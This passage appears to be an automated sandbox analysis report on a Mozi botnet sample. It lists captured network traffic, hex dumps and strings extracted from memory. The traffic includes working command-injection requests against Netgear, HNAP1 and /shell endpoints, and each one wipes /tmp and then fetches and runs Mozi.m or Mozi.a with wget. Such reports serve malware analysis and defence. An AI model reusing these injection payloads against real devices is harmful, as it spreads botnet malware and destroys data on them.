62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:47:34 GMTServer: Apache/2.2.3 (Debian)Content-Length: 280Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 32 30 31 2e 34 39 2e 34 31 2e 37 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.3 (Debian) Server at 201.49.41.72 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:47:34 GMTServer: Apache/2.2.22 (Debian)X-Powered-By: PHP/5.4.45-0+deb7u14Vary: Accept-EncodingContent-Length: 2957Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/htmlX-Pad: avoid browser bugData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 52 65 71 75 65 73 74 65 64 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 68 74 6d 6c 20 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 36 25 3b 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 74 61 68 6f 6d 61 2c 76 65 72 64 61 6e 61 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 7d 0a 0a 09 62 6f 64 79 20 7b 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 74 61 68 6f 6d 61 2c 76 65 72 64 61 6e 61 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 6d 61 72 67 69 6e 3a 30 70 78 20 61 75 74 6f 3b 0a 09 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0a 09 09 77 69 64 74 68 3a 39 30 30 70 78 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 7d 0a 09 61 3a 6c 69 6e 6b 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 31 37 32 43 37 44 3b 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 09 61 3a 76 69 73 69 74 65 64 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 31 37 32 43 37 44 3b 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 09 61 3a 68 6f 76 65 72 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 34 35 37 44 43 39 3b 0a 09 7d 20 20 20 20 20 20 0a 09 69 6d 67 20 7b 0a 09 09 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 09 7d 0a 09 23 48 65 61 64 65 72 7b 0a 09 09 77 69 64 74 68 3a 20 39 30 30 70 78 3b 0a 09 09 68 65 69 67 68 74 3a 31 30 34 70 78 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 42 36 44 37 46 46 3b 0a 09 09 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 2e 6a 70 67 22 29 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 62
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.15.8Date: Tue, 16 Nov 2021 14:47:41 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.15.8</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 16 Nov 2021 14:47:51 GMTContent-Type: text/htmlContent-Length: 1198Connection: closeVary: Accept-EncodingData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 37 66 39 3b 20 68 65 69 67 68 74 3a 32 38 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 0a 2e 74 31 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 34 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 38 70 78 3b 7d 0a 2e 74 32 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 0a 6f 6c 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 30 70 78 20 32 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 0a 6f 6c 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 31 22 3e e6 82 a8 e7 9a 84 e8 af b7 e6 b1 82 e5 b8 a6 e6 9c 89 e4 b8 8d e5 90 88 e6 b3 95 e5 8f 82 e6 95 b0 ef bc 8c e5 b7 b2 e8 a2 ab e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e8 ae be e7 bd ae e6 8b a6 e6 88 aa ef bc 81 3c 2f 70 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 32 22 3e e5 8f af e8 83 bd e5 8e 9f e5 9b a0 ef bc 9a 3c 2f 70 3e 0a 09 09 09 3c 6f 6c 3e 0a 09 09 09 09 3c 6c 69 3e e6 82 a8 e6 8f 90 e4 ba a4 e7 9a 84 e5 86 85 e5 ae b9 e5 8c 85 e5 90 ab e5 8d b1 e9 99 a9 e7 9a 84 e6 94 bb e5 87 bb e8 af b7 e6 b1 82 3c 2f 6c 69 3e 0a 09 09 09 3c 2f 6f 6c 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Tue, 16 Nov 2021 14:47:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 42467Connection: closeX-Request-Id: ef485288-6a8c-448a-a0fb-a9632f449634X-Runtime: 0.001219Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 63 2d 53 74 69 63 6b 79 46 6f 6f 74 65 72 20 62 2d 62 72 6f 77 73 65 72 2d 63 68 72 6f 6d 65 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 e6 9d b1 e4 ba ac e3 83 ac e3 82 b8 e3 83 87 e3 83 b3 e3 82 b9 e3 83 9e e3 83 bc e3 82 b1 e3 83 83 e3 83 88 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 bd 8f e5 ae 85 e3 83 9e e3 83 8d e3 83 bc e3 82 92 e3 80 8c e7 9f a5 e3 82 8b e3 81 93 e3 81 a8 e3 80 8d e3 81 8b e3 82 89 e3 81 af e3 81 98 e3 82 81 e3 82 88 e3 81 86 ef bc 81 20 e3 81 93 e3 82 8c e3 81 8b e3 82 89 e3 81 ae e6 99 82 e4 bb a3 e3 80 81 e8 b3 87 e7 94 a3 e5 bd a2 e6 88 90 e3 82 84 e9 81 8b e7 94 a8 e3 81 af e3 81 be e3 81 99 e3 81 be e3 81 99 e9 87 8d e8 a6 81 e3 81 a7 e3 81 99 e3 80 82 e3 81 a7 e3 81 af e3 80 81 e4 bd 8f e3 81 be e3 81 84 e3 81 ae e8 b2 bb e7 94 a8 e3 82 84 e4 be a1 e5 80 a4 e3 82 92 e7 9f a5 e3 82 8b e3 81 93 e3 81 a8 e3 81 af e3 81 a9 e3 81 86 e3 81 a7 e3 81 97 e3 82 87 e3 81 86 e3 81 8b e3 80 82 e3 83 9e e3 83 b3 e3 82 b7 e3 83 a7 e3 83 b3 e3 82 92 e8 b2 b7 e3 81 86 e3 81 9e e3 80 81 e5 a3 b2 e3 82 8b e3 81 9e e3 81 a8 e5 8a 9b e3 82 80 e5 89 8d e3 81 ab e3 80 81 e9 95 b7 e3 81 84 e4 ba ba e7 94 9f e3 81 ae e3 80 8c e4 bd 8f e5 ae 85 e3 83 9e e3 83 8d e3 83 bc e3 80 8d e3 82 92 e5 b0 91 e3 81 97 e6 84 8f e8 ad 98 e3 81 99 e3 82 8b e3 81 93 e3 81 a8 e3 81 8b e3 82 89 e3 81 af e3 81 98 e3 82 81 e3 81 be e3 81 9b e3 82 93 e3 81 8b ef bc 9f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 0a 20 20 20 20 2a 3a 3a 62 65 66 6f 72 65 2c 0a 20 20 20 20 2a 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 35 3b 0a 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 2
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 16 Nov 2021 14:48:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closex-amzn-RequestId: e7b030a0-f51e-4aba-ba1c-3db988bfe780Data Raw: 55 73 65 72 20 69 73 20 6e 6f 74 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 70 65 72 66 6f 72 6d 20 74 68 69 73 20 61 63 74 69 6f 6e Data Ascii: User is not authorized to perform this action
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpString found in binary or memory: http://%s:%d/Mozi.a;chmod
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpString found in binary or memory: http://%s:%d/Mozi.a;sh$
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpString found in binary or memory: http://%s:%d/Mozi.m
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpString found in binary or memory: http://%s:%d/Mozi.m;
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpString found in binary or memory: http://%s:%d/Mozi.m;$
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpString found in binary or memory: http://%s:%d/bin.sh
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpString found in binary or memory: http://%s:%d/bin.sh;chmod
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpString found in binary or memory: http://127.0.0.1
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpString found in binary or memory: http://127.0.0.1sendcmd
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpString found in binary or memory: http://HTTP/1.1
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                            Source: .config.8.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                            Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpString found in binary or memory: http://ipinfo.io/ip
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca)
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpString found in binary or memory: http://purenetworks.com/HNAP1/
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org.
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca.
                            Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca/upload.php
                            Source: unknownHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.128.175.114:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 3.113.149.148:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 122.201.116.141:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 201.49.41.72:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 216.180.103.7:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
